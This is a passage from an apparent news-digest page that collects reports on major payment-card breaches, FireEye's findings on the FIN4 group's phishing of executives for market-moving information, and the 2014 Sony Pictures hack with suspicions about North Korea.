RBS WorldPay breach, hackers broke into unnamed card processing companies in India and the U.S. that handled pre-paid card accounts. They increased the limits on the accounts and handed off the details to cashers who drained more than $45 million from ATMs around the world. 3. Cisero’s Ristorante and Nightclub – Unknown: It’s unknown whether Cisero’s was actually ever breached or, if it was, how many cards were stolen. But those aren’t why Cisero’s made our list. The small, family-run restaurant in Park City, Utah made the list because it took on a David and Goliath battle against the card payment industry for unfair fines for a breach that has never been proven occurred. In March 2008, Visa notified U.S. Bank that Cisero’s network might have been compromised after cards used at the restaurant were used for fraudulent transactions elsewhere. U.S. Bank, and its affiliate Elavon, processed bank card transactions for Cisero’s. The restaurant hired two firms to conduct a forensic investigation, but neither found any evidence that a breach occurred or that payment card data of any kind was stolen. The audits, however, did find that the point-of-sale system the restaurant used stored unencrypted customer account numbers, in violation of the PCI standard. Visa and MasterCard imposed fines of about $99,000 on U.S. Bank and Elavon since, under the PCI system, the banks and card processors that process transactions for merchants are fined, not the merchants and retailers themselves. U.S. Bank and Elavon then seized about $10,000 from the restaurant’s U.S. Bank bank account before the restaurant owners closed the account and sued. 2. Global Payments Inc – 1.5 million This Atlanta-based payments processor claimed it was breached sometime in January or February 2012. But in April 2012, Visa warned issuers that the breach likely dated back to 2011 and might have affected transactions going back to June 7, 2011. Little is known about the breach. In an April 2012 conference call with investors, CEO Paul R. Garcia told listeners that the breach had been limited to a “handful of servers” in its North American processing system and that no fraudulent activity had been seen on any of the cards. Unlike most breaches that are only discovered months after the intrusion and generally only after Visa, MasterCard and other members of the card industry notice a pattern of fraudulent activity on accounts, Garcia claimed his company discovered the breach on its own. “We had security measures in place that caught it,” he said. He acknowledged, however, that while the company’s loss-prevention software spotted data being exfiltrated from the company’s servers, it hadn’t prevented the data from going out in the first place. “So partly it worked and partly it didn’t,” he told investors. He said the company would be investing in additional security. The breach cost the company an estimated $94 million; $36 million of this was for fines and fraud losses and about $60 million was for investigation and remediation. 1. The Next Big Breach: Like death and taxes, the next big card breach is an assured thing. Source

@behave doar vine craciunul, oricumdupamine korea face o mare greseala.

Hackers are hitting companies with targeted attacks designed to steal insider information that could be used to manipulate stock trading, according to researchers at FireEye. FireEye reported uncovering the campaign in its Hacking the street? FIN4 likely playing the market threat report, confirming that the hackers have already targeted at least 100 companies. "FireEye is currently tracking a group that targets the email accounts of individuals privy to the most confidential information of more than 100 companies," read the report. "The FIN4 [hacking group] distinctly focuses on compromising the accounts of individuals who possess non-public information about merger and acquisition deals and major market-moving announcements." FireEye said that the campaign has been active since at least the middle of 2013, and primarily targets C-level executives, legal counsel, regulatory bodies, risk and compliance personnel, researchers, scientists and "people in other advisory roles". "FIN4 sends spear phishing emails to selected targets with weaponised documents," FireEye threat intelligence manager Jen Weedon told V3. "Based on what we've observed of FIN4's activity, the group selects its targets based on their roles and probable access to sensitive, material, non-public information. "The document, when opened, will result in a prompt for the target's username and password, which are then transmitted to servers controlled by FIN4." Weedon explained that the campaign is mainly US focused and targets specific industries. "?We have observed some international organisations being targeted. However, the overwhelming majority of targets have been in the US," Weedon said. "The primary industry hit has been healthcare and pharmaceuticals, and 68 percent of the 100-plus companies targeted are in that industry. "Twenty percent are firms that advise public companies on securities, legal and M&A matters, and 12 percent are other publicly traded companies in various industries." Weedon added that FIN4 uses a basic infection method, but that it is hard to detect and firms should employ a variety of protective measures. "The relative simplicity of FIN4's tactics (spear phishing, theft of valid credentials, lack of any malware installed on victim machines) makes their intrusion activity difficult to detect. However a few basic security measures can help thwart the group's efforts," Weedon said. "Disabling Visual Basic for Applications macros in Microsoft Office by default, as well as blocking the domains listed in our report, will help protect against FIN4's current activities. "Additionally, enabling two-factor authentication for Open Web Access and any other remote access mechanisms can help prevent credentials stolen in this manner from being leveraged successfully." Data theft is an ongoing problem facing businesses of all sizes. Hackers operating under the #GOP moniker reportedly stole intellectual property from Sony in November. The FBI reported on 1 December that it had found evidence that the #GOP hackers may be North Korean. Source

North Korea has refused to deny involvement in a cyber-attack on Sony Pictures that came ahead of the release of a film about leader Kim Jong-un. Sony is investigating after its computers were attacked and unreleased films made available on the internet. When asked if it was involved in the attack a spokesman for the North Korean government replied: "Wait and see." In June, North Korea complained to the United Nations and the US over the comedy film The Interview. In the movie, Seth Rogen and James Franco play two reporters who are granted an audience with Kim Jong-un. The CIA then enlists the pair to assassinate him. North Korea described the film as an act of war and an "undisguised sponsoring of terrorism", and called on the US and the UN to block it. California-based Sony Pictures' computer system went down last week and hackers then published a number of as-yet unreleased films on online download sites. Among the titles is a remake of the classic film Annie, which is not due for release until 19 December. The film about North Korea does not appear to have been leaked. When asked about the cyber-attack, a spokesman for North Korea's UN mission said: "The hostile forces are relating everything to the DPRK (North Korea). I kindly advise you to just wait and see." On Monday, Sony Pictures said it had restored a number of important services that had to be shut down after the attack. It said it was working closely with law enforcement officials to investigate the matter but made no mention of North Korea. The FBI has confirmed that it is investigating. It has also warned other US businesses that unknown hackers have launched a cyber-attack with destructive malware. Grey line Analysis: Leo Kelion, technology desk editor Suggestions North Korea could be behind the Sony Pictures hack has drawn incredulity from some, surprised that the "Hermit Kingdom" might be able to pull off such a stunt. In fact, experts say Pyongyang's cyber-skills should not be underestimated. One US government adviser warned last year that North Korean hackers posed "an important 'wild card' threat" to US and international security. Being sure about how far its cyber-capabilities extend isn't easy. A report by Hewlett Packard's security division noted that most North Koreans were restricted to an intranet system, separate from the wider internet, which limits their links to the outside world. But the report noted that the state's education system places special emphasis on mathematics, which has helped it develop skilled programmers, cryptographers and security researchers. According to a report by Al-Jazeera, North Korean defectors have spoken of promising students going on a two-year accelerated university course before heading to China and Russia for a year to hone their hacking skills. A US analyst quoted a defector who claimed to be part of North Korea's Unit 121 hacking squad until he escaped in 2004. He said some operations had been carried out from a Pyongyang-owned hotel in Shenyang, China. According to HP, North Korea's "cyber-warriors" are thought to have carried out a wide variety of attacks, including: Spreading malware via video games Stealing details of foreign technologies stored on computers Carrying out distributed denial of service attacks (DDoS), which knock services offline by flooding them with traffic sent from hijacked foreign computers Cyber-psychological operations - posting propaganda to social networks and "trolling" message boards However, hacking a major corporation to make threatening demands is not a behaviour that has been linked to North Korea in the past, and the hashtag #GOP (Guardians of Peace) - used in the Sony attack - is not known to have been used by Pyongyang. Source